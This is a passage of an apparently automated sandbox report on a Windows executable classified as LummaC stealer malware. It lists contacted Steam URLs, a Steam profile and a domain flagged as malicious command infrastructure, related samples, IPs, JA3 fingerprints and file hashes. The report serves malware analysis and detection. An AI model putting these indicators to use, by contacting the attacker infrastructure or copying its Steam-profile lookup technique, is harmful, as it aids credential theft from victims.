                                                                https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&amp;l=englishfile.exe, 00000000.00000003.2417153902.000000000134F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2236996064.0000000001346000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2236996064.000000000133F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • URL Reputation: safe
                                                                		unknown
                                                                https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.pngfile.exe, 00000000.00000003.2417153902.000000000134F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2236996064.0000000001346000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • URL Reputation: safe
                                                                		unknown
                                                                https://avatars.akamai.steamstaticfile.exe, 00000000.00000003.2236996064.000000000133F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		unknown
                                                                  https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&amp;l=englisfile.exe, 00000000.00000003.2417153902.000000000134F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2236996064.0000000001346000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2236996064.000000000133F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		unknown
                                                                    https://steamcommunity.com/profiles/76561199724331900qtfile.exe, 00000000.00000002.2446309521.00000000012E2000.00000004.00000020.00020000.00000000.sdmptrue
                                                                      		unknown
                                                                      https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhCfile.exe, 00000000.00000003.2417153902.000000000134F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2236996064.0000000001346000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2236996064.000000000133F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      		unknown
                                                                      https://store.steampowered.com/;file.exe, 00000000.00000003.2237080078.000000000133C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2237029874.000000000130E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2236996064.000000000133F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      		unknown
                                                                      https://store.steampowered.com/about/file.exe, 00000000.00000003.2236996064.0000000001346000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      		unknown
                                                                      https://steamcommunity.com/my/wishlist/file.exe, 00000000.00000003.2417153902.000000000134F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2236996064.0000000001346000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        		unknown
                                                                        https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=cdfmfile.exe, 00000000.00000003.2417153902.000000000134F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2236996064.0000000001346000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2446309521.00000000012B8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2236996064.000000000133F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          		unknown
                                                                          https://community.akamai.steamstatic.com/public/javascript/global.js?v=9OzcxMXbaV84&amp;l=englishfile.exe, 00000000.00000003.2417153902.000000000134F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2236996064.0000000001346000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2236996064.000000000133F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          		unknown
                                                                          https://help.steampowered.com/en/file.exe, 00000000.00000003.2417153902.000000000134F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2236996064.0000000001346000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          		unknown
                                                                          https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/file.exe, 00000000.00000003.2236996064.000000000133F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            		unknown
                                                                            https://steamcommunity.com/market/file.exe, 00000000.00000003.2417153902.000000000134F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2236996064.0000000001346000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              		unknown
                                                                              https://store.steampowered.com/news/file.exe, 00000000.00000003.2417153902.000000000134F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2236996064.0000000001346000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              • URL Reputation: safe
                                                                              		unknown
                                                                              https://community.akamai.steamstatic.com/file.exe, 00000000.00000003.2236996064.000000000133F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              • URL Reputation: safe
                                                                              		unknown
                                                                              http://store.steampowered.com/subscriber_agreement/file.exe, 00000000.00000003.2417153902.000000000134F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2236996064.0000000001346000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2446309521.00000000012B8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2236996064.000000000133F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              • URL Reputation: safe
                                                                              		unknown
                                                                              https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.orgfile.exe, 00000000.00000003.2417153902.000000000134F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2236996064.0000000001346000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2446309521.00000000012B8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2236996064.000000000133F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                		unknown
                                                                                https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r1file.exe, 00000000.00000003.2417153902.000000000134F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2236996064.0000000001346000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2236996064.000000000133F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                • URL Reputation: safe
                                                                                		unknown
                                                                                https://recaptcha.net/recaptcha/;file.exe, 00000000.00000003.2236996064.000000000133F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                • URL Reputation: safe
                                                                                		unknown
                                                                                https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&amp;l=enfile.exe, 00000000.00000003.2417153902.000000000134F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2236996064.0000000001346000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2236996064.000000000133F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                • URL Reputation: safe
                                                                                		unknown
                                                                                https://steamcommunity.com/discussions/file.exe, 00000000.00000003.2417153902.000000000134F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2236996064.0000000001346000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  		unknown
                                                                                  https://store.steampowered.com/stats/file.exe, 00000000.00000003.2417153902.000000000134F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2236996064.0000000001346000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • URL Reputation: safe
                                                                                  		unknown
                                                                                  https://medal.tvfile.exe, 00000000.00000003.2236996064.000000000133F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • URL Reputation: safe
                                                                                  		unknown
                                                                                  https://broadcast.st.dl.eccdnx.comfile.exe, 00000000.00000003.2236996064.000000000133F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • URL Reputation: safe
                                                                                  		unknown
                                                                                  https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1file.exe, 00000000.00000003.2417153902.000000000134F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2236996064.0000000001346000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2446309521.00000000012B8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2236996064.000000000133F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • URL Reputation: safe
                                                                                  		unknown
                                                                                  https://store.steampowered.com/steam_refunds/file.exe, 00000000.00000003.2417153902.000000000134F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2236996064.0000000001346000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • URL Reputation: safe
                                                                                  		unknown
                                                                                  https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900file.exe, 00000000.00000003.2236996064.0000000001346000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    		unknown
                                                                                    https://sergei-esenin.com/api3file.exe, 00000000.00000002.2446309521.000000000130E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      		unknown
                                                                                      https://steamcommunity.com/workshop/file.exe, 00000000.00000003.2417153902.000000000134F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2236996064.0000000001346000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        		unknown
                                                                                        https://login.steampowered.com/file.exe, 00000000.00000003.2236996064.000000000133F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        • URL Reputation: safe
                                                                                        		unknown
                                                                                        https://store.steampowered.com/legal/file.exe, 00000000.00000003.2417153902.000000000134F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2236996064.0000000001346000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2446309521.00000000012B8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2236996064.000000000133F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        • URL Reputation: safe
                                                                                        		unknown
                                                                                        https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&amp;l=efile.exe, 00000000.00000003.2417153902.000000000134F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2236996064.0000000001346000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2236996064.000000000133F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          		unknown
                                                                                          https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=qu55UpguGheU&amp;l=efile.exe, 00000000.00000003.2417153902.000000000134F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2236996064.0000000001346000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2236996064.000000000133F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            		unknown
                                                                                            https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSvfile.exe, 00000000.00000003.2417153902.000000000134F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2236996064.0000000001346000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2236996064.000000000133F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            • URL Reputation: safe
                                                                                            		unknown
                                                                                            https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&amp;l=englfile.exe, 00000000.00000003.2236996064.000000000133F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            • URL Reputation: safe
                                                                                            		unknown
                                                                                            https://recaptcha.netfile.exe, 00000000.00000003.2236996064.000000000133F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            • URL Reputation: safe
                                                                                            		unknown
                                                                                            https://store.steampowered.com/file.exe, 00000000.00000003.2236996064.000000000133F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            • URL Reputation: safe
                                                                                            		unknown
                                                                                            https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvwfile.exe, 00000000.00000003.2417153902.000000000134F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2236996064.0000000001346000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2236996064.000000000133F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            • URL Reputation: safe
                                                                                            		unknown
                                                                                            https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.giffile.exe, 00000000.00000003.2417153902.000000000134F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2236996064.0000000001346000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2446309521.00000000012B8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2236996064.000000000133F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            • URL Reputation: safe
                                                                                            		unknown
                                                                                            http://127.0.0.1:27060file.exe, 00000000.00000003.2236996064.000000000133F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              		unknown
                                                                                              https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=10oP_O2Rfile.exe, 00000000.00000003.2417153902.000000000134F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2236996064.0000000001346000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2446309521.00000000012B8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2236996064.000000000133F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                		unknown
                                                                                                https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016file.exe, 00000000.00000003.2417153902.000000000134F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2236996064.0000000001346000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                • URL Reputation: safe
                                                                                                		unknown
                                                                                                http://crl.micros0file.exe, 00000000.00000003.2237080078.000000000133C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2237029874.000000000130E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2446309521.000000000130E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  		unknown
                                                                                                  https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&amp;l=englishfile.exe, 00000000.00000003.2417153902.000000000134F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2236996064.0000000001346000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2236996064.000000000133F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  • URL Reputation: safe
                                                                                                  		unknown
                                                                                                  https://help.steampowered.com/file.exe, 00000000.00000003.2236996064.000000000133F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  • URL Reputation: safe
                                                                                                  		unknown
                                                                                                  https://api.steampowered.com/file.exe, 00000000.00000003.2236996064.000000000133F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  • URL Reputation: safe
                                                                                                  		unknown
                                                                                                  http://store.steampowered.com/account/cookiepreferences/file.exe, 00000000.00000003.2417153902.000000000134F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2236996064.0000000001346000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2446309521.00000000012B8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2236996064.000000000133F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  • URL Reputation: safe
                                                                                                  		unknown
                                                                                                  https://store.steampowered.com/mobilefile.exe, 00000000.00000003.2417153902.000000000134F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2236996064.0000000001346000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  • URL Reputation: safe
                                                                                                  		unknown
                                                                                                  https://steamcommunity.com/file.exe, 00000000.00000003.2236996064.000000000133F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    		unknown
                                                                                                    https://community.akamai.steamstatic.com/public/javascript/profile.js?v=f3vWO7swdDqp&amp;l=englishfile.exe, 00000000.00000003.2417153902.000000000134F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2236996064.0000000001346000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2236996064.000000000133F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    • URL Reputation: safe
                                                                                                    		unknown
                                                                                                    https://community.akamai.steamstatic.com/public/javascript/modalContent.js?v=f2hMA1v9Zkc8&amp;l=englfile.exe, 00000000.00000003.2417153902.000000000134F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2236996064.0000000001346000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2236996064.000000000133F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    • URL Reputation: safe
                                                                                                    		unknown
                                                                                                    https://steamcommunity.com/profiles/76561199724331900/badgesfile.exe, 00000000.00000003.2417153902.000000000134F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2236996064.0000000001346000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2446309521.00000000012B8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2236996064.000000000133F000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                    • URL Reputation: malware
                                                                                                    		unknown

                                                                                                    World Map of Contacted IPs

                                                                                                    • No. of IPs < 25%
                                                                                                    • 25% < No. of IPs < 50%
                                                                                                    • 50% < No. of IPs < 75%
                                                                                                    • 75% < No. of IPs

                                                                                                    Public IPs

                                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                                    104.21.53.8
                                                                                                    		sergei-esenin.comUnited States
                                                                                                    		13335CLOUDFLARENETUStrue
                                                                                                    104.102.49.254
                                                                                                    		steamcommunity.comUnited States
                                                                                                    		16625AKAMAI-ASUSfalse

                                                                                                    General Information

                                                                                                    Joe Sandbox version:41.0.0 Charoite
                                                                                                    Analysis ID:1529340
                                                                                                    Start date and time:2024-10-08 21:41:09 +02:00
                                                                                                    Joe Sandbox product:CloudBasic
                                                                                                    Overall analysis duration:0h 4m 59s
                                                                                                    Hypervisor based Inspection enabled:false
                                                                                                    Report type:full
                                                                                                    Cookbook file name:default.jbs
                                                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                    Number of analysed new started processes analysed:6
                                                                                                    Number of new started drivers analysed:0
                                                                                                    Number of existing processes analysed:0
                                                                                                    Number of existing drivers analysed:0
                                                                                                    Number of injected processes analysed:0
                                                                                                    Technologies:
                                                                                                    • HCA enabled
                                                                                                    • EGA enabled
                                                                                                    • AMSI enabled
                                                                                                    Analysis Mode:default
                                                                                                    Analysis stop reason:Timeout
                                                                                                    Sample name:file.exe
                                                                                                    Detection:MAL
                                                                                                    Classification:mal100.troj.evad.winEXE@1/0@10/2
                                                                                                    EGA Information:
                                                                                                    • Successful, ratio: 100%
                                                                                                    HCA Information:Failed
                                                                                                    Cookbook Comments:
                                                                                                    • Found application associated with file extension: .exe

                                                                                                    Warnings

                                                                                                    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                                                    • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, dns.msftncsi.com, fe3cr.delivery.mp.microsoft.com
                                                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                    • VT rate limit hit for: file.exe

                                                                                                    Simulations

                                                                                                    Behavior and APIs

                                                                                                    TimeTypeDescription
                                                                                                    15:42:14API Interceptor1x Sleep call for process: file.exe modified

                                                                                                    Joe Sandbox View / Context

                                                                                                    IPs

                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                    104.21.53.8file.exeGet hashmaliciousLummaCBrowse
                                                                                                      file.exeGet hashmaliciousLummaC, VidarBrowse
                                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                                          file.exeGet hashmaliciousLummaCBrowse
                                                                                                            VmRHSCaiyc.exeGet hashmaliciousLummaC, VidarBrowse
                                                                                                              SecuriteInfo.com.Trojan.DownLoader47.43340.9153.30810.exeGet hashmaliciousLummaCBrowse
                                                                                                                file.exeGet hashmaliciousLummaCBrowse
                                                                                                                  SecuriteInfo.com.Win32.PWSX-gen.27846.23954.exeGet hashmaliciousLummaCBrowse
                                                                                                                    lihZ6gUU7V.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                      file.exeGet hashmaliciousLummaCBrowse
                                                                                                                        104.102.49.254http://gtm-cn-j4g3qqvf603.steamproxy1.com/Get hashmaliciousUnknownBrowse
                                                                                                                        • www.valvesoftware.com/legal.htm

                                                                                                                        Domains

                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                        sergei-esenin.comSecuriteInfo.com.Trojan.DownLoader47.43477.29852.19410.exeGet hashmaliciousLummaC, VidarBrowse
                                                                                                                        • 172.67.206.204
                                                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                                                        • 172.67.206.204
                                                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                                                        • 104.21.53.8
                                                                                                                        file.exeGet hashmaliciousLummaC, VidarBrowse
                                                                                                                        • 104.21.53.8
                                                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                                                        • 104.21.53.8
                                                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                                                        • 104.21.53.8
                                                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                                                        • 172.67.206.204
                                                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                                                        • 172.67.206.204
                                                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                                                        • 172.67.206.204
                                                                                                                        lHHfXU6Y37.exeGet hashmaliciousLummaCBrowse
                                                                                                                        • 172.67.206.204
                                                                                                                        steamcommunity.comSecuriteInfo.com.Trojan.DownLoader47.43477.29852.19410.exeGet hashmaliciousLummaC, VidarBrowse
                                                                                                                        • 104.102.49.254
                                                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                                                        • 104.102.49.254
                                                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                                                        • 104.102.49.254
                                                                                                                        PWGen_[2MB]_[unsign].exeGet hashmaliciousLummaCBrowse
                                                                                                                        • 104.102.49.254
                                                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                                                        • 104.102.49.254
                                                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                                                        • 104.102.49.254
                                                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                                                        • 104.102.49.254
                                                                                                                        15PylGQjzK.exeGet hashmaliciousLummaC, VidarBrowse
                                                                                                                        • 104.102.49.254
                                                                                                                        Ji7kZhlqxz.exeGet hashmaliciousLummaC, VidarBrowse
                                                                                                                        • 104.102.49.254
                                                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                                                        • 23.192.247.89

                                                                                                                        ASNs

                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                        CLOUDFLARENETUShttps://shoutout.wix.com/so/68P9j4pbc/c?w=YIpy_LmKpeOuRTcqEasLgbctjTenhex96yD397bZU04.eyJ1IjoiaHR0cHM6Ly9maWxlc3NoYXJlcy5naXRodWIuaW8vYXJ1dHkvIiwiciI6IjU3ZWU5MDNjLTU1YjktNDMxYS0zNDRiLWUzZjYxNjRhN2I0MiIsIm0iOiJtYWlsIiwiYyI6IjAwMDAwMDAwLTAwMDAtMDAwMC0wMDAwLTAwMDAwMDAwMDAwMCJ9Get hashmaliciousHTMLPhisherBrowse
                                                                                                                        • 172.67.136.56
                                                                                                                        Remittance_Regulvar.htmGet hashmaliciousUnknownBrowse
                                                                                                                        • 172.64.151.101
                                                                                                                        securedoc_20241008T101508.htmlGet hashmaliciousUnknownBrowse
                                                                                                                        • 104.17.25.14
                                                                                                                        Adfast Canada Request For Proposal (RFP) ID#9009.pdfGet hashmaliciousUnknownBrowse
                                                                                                                        • 104.18.95.41
                                                                                                                        fBcMVl6ns6.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                        • 188.114.96.3
                                                                                                                        rpQF1aDIK4.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                        • 188.114.96.3
                                                                                                                        test.ps1Get hashmaliciousRHADAMANTHYSBrowse
                                                                                                                        • 188.114.96.3
                                                                                                                        path.ps1Get hashmaliciousDcRatBrowse
                                                                                                                        • 188.114.97.3
                                                                                                                        https://climate-consultant.informer.com/6.0/Get hashmaliciousUnknownBrowse
                                                                                                                        • 104.21.80.92
                                                                                                                        SecuriteInfo.com.Trojan.DownLoader47.43477.29852.19410.exeGet hashmaliciousLummaC, VidarBrowse
                                                                                                                        • 104.21.79.35
                                                                                                                        AKAMAI-ASUSAdfast Canada Request For Proposal (RFP) ID#9009.pdfGet hashmaliciousUnknownBrowse
                                                                                                                        • 184.28.88.176
                                                                                                                        SecuriteInfo.com.Trojan.DownLoader47.43477.29852.19410.exeGet hashmaliciousLummaC, VidarBrowse
                                                                                                                        • 104.102.49.254
                                                                                                                        Demande de proposition de AVANTAGE INDUSTRIEL INC.pdfGet hashmaliciousHtmlDropperBrowse
                                                                                                                        • 23.203.104.175
                                                                                                                        UuYpv6CTVM.elfGet hashmaliciousMiraiBrowse
                                                                                                                        • 104.97.45.242
                                                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                                                        • 104.102.49.254
                                                                                                                        2LgQzImW3E.elfGet hashmaliciousMiraiBrowse
                                                                                                                        • 23.204.209.0
                                                                                                                        https://google.com/amp/s/login.sharesyncportal.tech/dmYzPMejGet hashmaliciousHTMLPhisherBrowse
                                                                                                                        • 2.19.126.143
                                                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                                                        • 104.102.49.254
                                                                                                                        X309qRfJAl.elfGet hashmaliciousMiraiBrowse
                                                                                                                        • 92.123.108.251
                                                                                                                        WNHEP77Hem.elfGet hashmaliciousUnknownBrowse
                                                                                                                        • 23.59.85.254

                                                                                                                        JA3 Fingerprints

                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                        a0e9f5d64349fb13191bc781f81f42e1SecuriteInfo.com.Trojan.DownLoader47.43477.29852.19410.exeGet hashmaliciousLummaC, VidarBrowse
                                                                                                                        • 104.21.53.8
                                                                                                                        • 104.102.49.254
                                                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                                                        • 104.21.53.8
                                                                                                                        • 104.102.49.254
                                                                                                                        77IyY7nCKB.xlsGet hashmaliciousUnknownBrowse
                                                                                                                        • 104.21.53.8
                                                                                                                        • 104.102.49.254
                                                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                                                        • 104.21.53.8
                                                                                                                        • 104.102.49.254
                                                                                                                        EDc1DW9OsQ.xlsxGet hashmaliciousUnknownBrowse
                                                                                                                        • 104.21.53.8
                                                                                                                        • 104.102.49.254
                                                                                                                        O4zPA1oI9Y.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                                        • 104.21.53.8
                                                                                                                        • 104.102.49.254
                                                                                                                        PWGen_[2MB]_[unsign].exeGet hashmaliciousLummaCBrowse
                                                                                                                        • 104.21.53.8
                                                                                                                        • 104.102.49.254
                                                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                                                        • 104.21.53.8
                                                                                                                        • 104.102.49.254
                                                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                                                        • 104.21.53.8
                                                                                                                        • 104.102.49.254
                                                                                                                        Y1ZqkGzvKm.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                        • 104.21.53.8
                                                                                                                        • 104.102.49.254

                                                                                                                        Dropped Files

                                                                                                                        No context

                                                                                                                        Created / dropped Files

                                                                                                                        No created / dropped files found

                                                                                                                        Static File Info

                                                                                                                        General

                                                                                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Entropy (8bit):7.94745409631708
                                                                                                                        TrID:
                                                                                                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                        • DOS Executable Generic (2002/1) 0.02%
                                                                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                        File name:file.exe
                                                                                                                        File size:1'852'928 bytes
                                                                                                                        MD5:a322b061da9d5ab15e043189a6931bc2
                                                                                                                        SHA1:4e81ba25e41d103b329916270e66175c1fc8e0ba
                                                                                                                        SHA256:a4f696da6fd8904713eb22b46113d21d886604dd8bd280a3808833cfade0100b
                                                                                                                        SHA512:e41fd10c37d714028cdef9d934aaced246af2860333f20c6409e29a4fe3bd193625cd1be214a6f8031e5beabb532dd3e840b90275b37b64d9a856d17fbe1517b
                                                                                                                        SSDEEP:49152:Kpo3Tmuw3RJ0zxw5lYfLun74Arr1s17Eu+:KMyGxw5lYfys77Eh
                                                                                                                        TLSH:A5853321CB70BEE4D768B976C2F60A263E737074E7C039BC9AA1F48E6246553C706499
                                                                                                                        File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...J..f..............................J...........@..........................@J...........@.................................W...k..

                                                                                                                        File Icon

                                                                                                                        Icon Hash:00928e8e8686b000

                                                                                                                        Static PE Info

                                                                                                                        General

